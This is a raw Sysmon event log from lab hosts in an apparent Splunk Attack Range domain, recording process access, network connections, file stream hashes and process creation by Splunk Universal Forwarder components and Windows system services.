07:49:00.493{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103193Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.493{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103192Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.493{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B1EC-615A-BE01-00000000FC01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103191Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.493{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1EC-615A-BE01-00000000FC01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103190Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.494{58E9C193-B1EC-615A-BE01-00000000FC01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000103189Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.321{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-AC86-615A-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x8000000000000000103188Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.337{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49501-false10.0.1.12-8000- 10341000x8000000000000000103187Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.993{58E9C193-B1EB-615A-BD01-00000000FC01}60526248C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081104Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:01.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB28C4C0C98DF36F7732B4DE3B1DCDC6,SHA256=F5836EA52E58C4F6458056AE0E3C19BCB454AA0FD57C2EE3F383441D479ED88F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103205Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:01.633{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83EC91551B1CBC8EAA8B9DDA6AEBD9E,SHA256=EDED7EE6D4456107D9A786269711311BF6179037C73AA151BD4ED81AEA7F5431,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103204Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.450{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49502-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000103203Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.450{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49502-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 23542300x800000000000000081105Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:02.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C206413DEDACD21C9275DA81BBA2C7C8,SHA256=262F69C941AFFEDFF892F11F158DC41546713B59F52BC32831118077F4F61194,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103215Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.790{58E9C193-B1EE-615A-BF01-00000000FC01}66805040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103214Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.649{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DA602316C970D9B088484F4968B5729,SHA256=817C219F9471B9A14F8EBEBD663A3D844C67D0590DD658012B8B3B1F4F65B4BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103213Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.352{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1EE-615A-BF01-00000000FC01}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103212Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.352{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103211Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.352{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103210Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.352{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103209Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.352{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103208Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.352{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B1EE-615A-BF01-00000000FC01}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103207Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.352{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1EE-615A-BF01-00000000FC01}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103206Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:02.353{58E9C193-B1EE-615A-BF01-00000000FC01}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081106Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:03.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8059D893501848A9874D278F5FE7FDC,SHA256=2E2DD2D730FEF3CC7CFF83A5C62971E4F41ACA9E305F3F8CEA4438EF37969851,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103238Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.899{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1EF-615A-C101-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103237Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.899{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103236Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.899{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103235Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.899{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103234Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.899{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103233Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.899{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B1EF-615A-C101-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103232Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.899{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1EF-615A-C101-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103231Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.901{58E9C193-B1EF-615A-C101-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 